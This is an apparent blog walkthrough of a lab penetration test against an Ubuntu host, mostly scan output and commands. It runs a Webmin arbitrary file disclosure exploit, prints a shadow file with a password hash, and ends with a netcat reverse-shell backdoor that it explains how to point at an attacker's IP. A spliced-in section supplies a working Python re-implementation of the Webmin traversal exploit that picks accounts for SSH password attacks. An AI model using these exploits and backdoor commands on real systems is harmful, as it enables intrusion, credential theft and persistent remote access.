Monday, 30 January 2012

Privilege Escalation


A. Information Gathering and Service Enumeration
1. Scan with nmap (-A turns on OS detection, version detection, NSE script scanning and traceroute):
root@BT:~# nmap -v -A 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:31 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:31
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:31, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:32, 13.00s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 192.168.0.112 [1000 ports]
Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 19:32, 0.15s elapsed (1000 total ports)
Initiating Service scan at 19:32
Scanning 5 services on 192.168.0.112
Completed Service scan at 19:32, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 19:32
Completed NSE at 19:32, 10.40s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00070s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.078 days (since Mon Jan 30 17:39:51 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
|   NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UBUNTUVM<00>         Flags: <unique><active>
|     UBUNTUVM<03>         Flags: <unique><active>
|     UBUNTUVM<20>         Flags: <unique><active>
|     MSHOME<1e>           Flags: <group><active>
|_    MSHOME<00>           Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name:
|_  System time: 2012-01-31 02:32:26 UTC-6

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.0.112

NSE: Script Post-scanning.
Initiating NSE at 19:32
Completed NSE at 19:32, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.54 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)


2. Scan with Nessus
NESSUS REPORT
List of Plugin IDs

The following plugin IDs have problems associated with them.

Plugin ID#  #  Plugin Name                                                      Severity
32314       1  Debian OpenSSH/OpenSSL Package Random Number Generator Weakness  High Severity problem(s) found

PORT SSH (22/TCP)
Plugin ID: 32314
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness

Synopsis
The remote SSH host keys are weak.
List of Hosts
192.168.0.112


Description

The remote SSH host key has been generated on a Debian
or Ubuntu system which contains a bug in the random number
generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all
sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote
key and use it to decipher the remote session or
set up a man-in-the-middle attack.

Solution
Consider all cryptographic material generated on the remote host
to be guessable. In particular, all SSH, SSL and OpenVPN key
material should be re-generated.

Risk Factor
Critical/ CVSS Base Score: 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score: 8.3(CVSS2#E:F/RL:OF/RC:C)


Bugtraq ID
29179

Other References OSVDB:45029

Plugin publication date: 2008/05/14
Plugin last modification date: 2011/03/21
Ease of exploitability : Exploits are available
Exploitable with: Core Impact





Host: 192.168.0.112
Scan time: start Mon Jan 30 19:31:52 2012, end Mon Jan 30 19:36:04 2012
Number of vulnerabilities: High 1, Medium 5, Low 38

Remote host information
Operating system: Linux Kernel 2.6
NetBIOS name: UBUNTUVM
IP address: 192.168.0.112
MAC address: 08:00:27:aa:ec:6d

An earlier NULL scan (-sN) of the same host. A closed port answers a NULL probe with RST while an open port does not answer at all, so nmap can only report the five listening ports as open|filtered and has to guess their service names from its port table; the -A scan above is what actually confirms the state and versions:
root@BT:~# nmap -v -sN 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:29 WIT
Initiating ARP Ping Scan at 19:29
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:29, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:29
Completed Parallel DNS resolution of 1 host. at 19:29, 13.00s elapsed
Initiating NULL Scan at 19:29
Scanning 192.168.0.112 [1000 ports]
Completed NULL Scan at 19:30, 2.37s elapsed (1000 total ports)
Nmap scan report for 192.168.0.112
Host is up (0.0022s latency).
Not shown: 995 closed ports
PORT      STATE         SERVICE
22/tcp    open|filtered ssh
80/tcp    open|filtered http
139/tcp   open|filtered netbios-ssn
445/tcp   open|filtered microsoft-ds
10000/tcp open|filtered snet-sensor-mgmt
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds
           Raw packets sent: 1017 (40.668KB) | Rcvd: 996 (39.828KB)
B. Exploitation: Webmin arbitrary file disclosure
1. Change into the Exploit-DB archive shipped with BackTrack:
root@BT:~# cd /pentest/exploits/exploitdb/

2. List the directory to see what is there:
root@BT:/pentest/exploits/exploitdb# ls
files.csv  platforms  searchsploit

3. Search the archive for Webmin exploits (nmap identified port 10000 as Webmin's MiniServ):
root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

4. Copy the Perl version of the file disclosure exploit to the home directory:
root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~

5. Return to the home directory:
root@BT:/pentest/exploits/exploitdb# cd

6. List the home directory to confirm the copy:
root@BT:~# ls
2017.pl                          NessusReport21.rtf  NessusReport45.rtf  subnet
Desktop                          NessusReport26.rtf  NessusReport63.rtf  VirtualBox VMs
download                         NessusReport27.rtf  NessusReport65.rtf  workspace
galau.ps                         NessusReport32.rtf  NessusReport66.rtf  xpreport.rtf
galau.txt                        NessusReport35.rtf  NessusReport67.rtf
IS2C                             NessusReport40.rtf  NessusReport70.rtf
Nessus-4.4.1-ubuntu910_i386.deb  NessusReport44.rtf  NessusReport.rtf

7. Run the script without arguments to get its usage. It needs four arguments: a host name (the usage example passes a bare blah.com), the port, the full path of the file to read, and a target number selecting HTTP (0) or HTTPS (1). The second attempt below prints usage again because the file name and target are missing:
root@BT:~# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@BT:~# perl 2017.pl 192.168.0.112 10000
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

8. Use the arbitrary file disclosure to read /etc/passwd from the target, with target 0 because nmap saw plain HTTP on port 10000:
root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking http://192.168.0.112 on port 10000!
FILENAME:  /etc/passwd

 FILE CONTENT STARTED
 -----------------------------------

 -------------------------------------
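The request above ran but returned nothing, and 2017.pl gives no hint why. The following is an added example, not code from the original post and not the 2017.pl script: a Python re-implementation of the Webmin < 1.290 / Usermin < 1.220 arbitrary file disclosure that the post drives through 2017.pl, with the response checks the run above was missing. The traversal form (the /unauthenticated/ prefix followed by repeated "..%01/" segments) is the one from the public advisory the exploit banner refers to; the default depth of 40, the sample /etc/passwd content and the host and port used for a live run are assumptions constructed for the demo.

```python
"""
Added example, not from the original post and not 2017.pl: the Webmin
< 1.290 / Usermin < 1.220 arbitrary file disclosure in Python, plus a
verdict on the response instead of an empty FILE CONTENT block.
"""
import http.client
import ssl
from typing import Dict, List, Tuple

# Constructed sample of what a successful disclosure of /etc/passwd returns.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "www-data:x:33:33:www-data:/var/www:/bin/sh\n"
    "sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin\n"
)


def build_disclosure_path(filename: str, depth: int = 40) -> str:
    """Return the request path that reads an absolute file on the target.

    Each "..%01/" is the advisory's encoded parent-directory step: affected
    miniserv versions filter a plain "../" but let this form through.
    Climbing past "/" is a no-op, so depth only has to be large enough
    (assumption: 40, the figure the published PoC uses).
    """
    if not filename.startswith("/"):
        raise ValueError("give the full path on the target, e.g. /etc/passwd")
    return "/unauthenticated/" + "..%01/" * depth + filename.lstrip("/")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse passwd(5) content into records, skipping malformed lines."""
    users = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        users.append({"name": name, "uid": uid, "gid": gid, "home": home,
                      "shell": shell,
                      # "x" means the hash lives in /etc/shadow, not here
                      "hash_in_passwd": pw not in ("x", "*", "!", "")})
    return users


def interactive_accounts(users: List[Dict[str, str]]) -> List[str]:
    """Names with a usable login shell, i.e. candidates for an SSH password attack."""
    return [u["name"] for u in users
            if not u["shell"].endswith(("nologin", "/false", "/sync"))]


def classify_response(status: int, body: str) -> str:
    """Turn the raw HTTP result into a verdict instead of printing nothing."""
    if status != 200:
        return f"no disclosure (HTTP {status})"
    if not body.strip():
        # The outcome the post got: request accepted, empty FILE CONTENT.
        return "empty body: request accepted but nothing disclosed"
    if parse_passwd(body):
        return "disclosed"
    return "unexpected body: check traversal depth, file name and HTTP/HTTPS"


def fetch_file(host: str, port: int, filename: str,
               use_https: bool = False, timeout: float = 10) -> Tuple[int, str]:
    """Live request against a target (not exercised offline).

    Webmin is often served over TLS with a self-signed certificate, so
    certificate verification is disabled for the https case.
    """
    path = build_disclosure_path(filename)
    if use_https:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=timeout)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read().decode("latin-1")
    conn.close()
    return resp.status, body


if __name__ == "__main__":
    # Offline walk-through: the path, the empty result the post got, and a
    # parsed sample.  A live run would be fetch_file("192.168.0.112", 10000,
    # "/etc/passwd") with use_https=True if target 1 is the right choice.
    print(build_disclosure_path("/etc/passwd", depth=3))
    print(classify_response(200, ""))
    users = parse_passwd(SAMPLE_PASSWD)
    print(classify_response(200, SAMPLE_PASSWD), interactive_accounts(users))
```

Two things the verdict function makes explicit that the Perl output hides: an HTTP 200 with an empty body is a failed attempt, not a success, and even a real /etc/passwd read only yields account names and shells (the "x" field says the hashes are in /etc/shadow), which is why the next target for this bug is /etc/shadow, not the file shown above.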

The FILE CONTENT block above is empty: the request completed, but nothing was disclosed, so at this point no password material has been obtained from the target. Before concluding the host is not vulnerable, note that the script's usage example passes a bare host name (blah.com) as <url> while this run passed http://192.168.0.112, and that Webmin is often served over TLS, which would need target 1. Even a successful read of /etc/passwd only yields user names; the hashes live in /etc/shadow.

9. For comparison, this is the shadow file on the attacking BackTrack machine, read locally (the prompt is root@BT). It is not data recovered from 192.168.0.112:
root@BT:~# cat /etc/shadow
root@BT:~# cat /etc/shadow
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::

C. Backdooring with netcat
1. On the attacker, listen for the call-back:
nc -l -p 1234
2. On the compromised host, connect to the listener and attach a shell to the connection:
nc localhost 1234 -e /bin/bash
As written both commands use localhost, so this is a demonstration on one machine: the shell connects to its own listener. For a real backdoor the second command names the attacker's IP address instead of localhost, and the listener is whatever reaches the compromised host through the firewall (an outbound connection from the victim, which is why the listener is on the attacker and not the other way round). The -e option exists only in the traditional netcat (netcat-traditional on Debian and Ubuntu) and in ncat as -e/--exec; the OpenBSD nc that many distributions install as nc has no -e, so on those builds the shell has to be attached to the socket some other way.


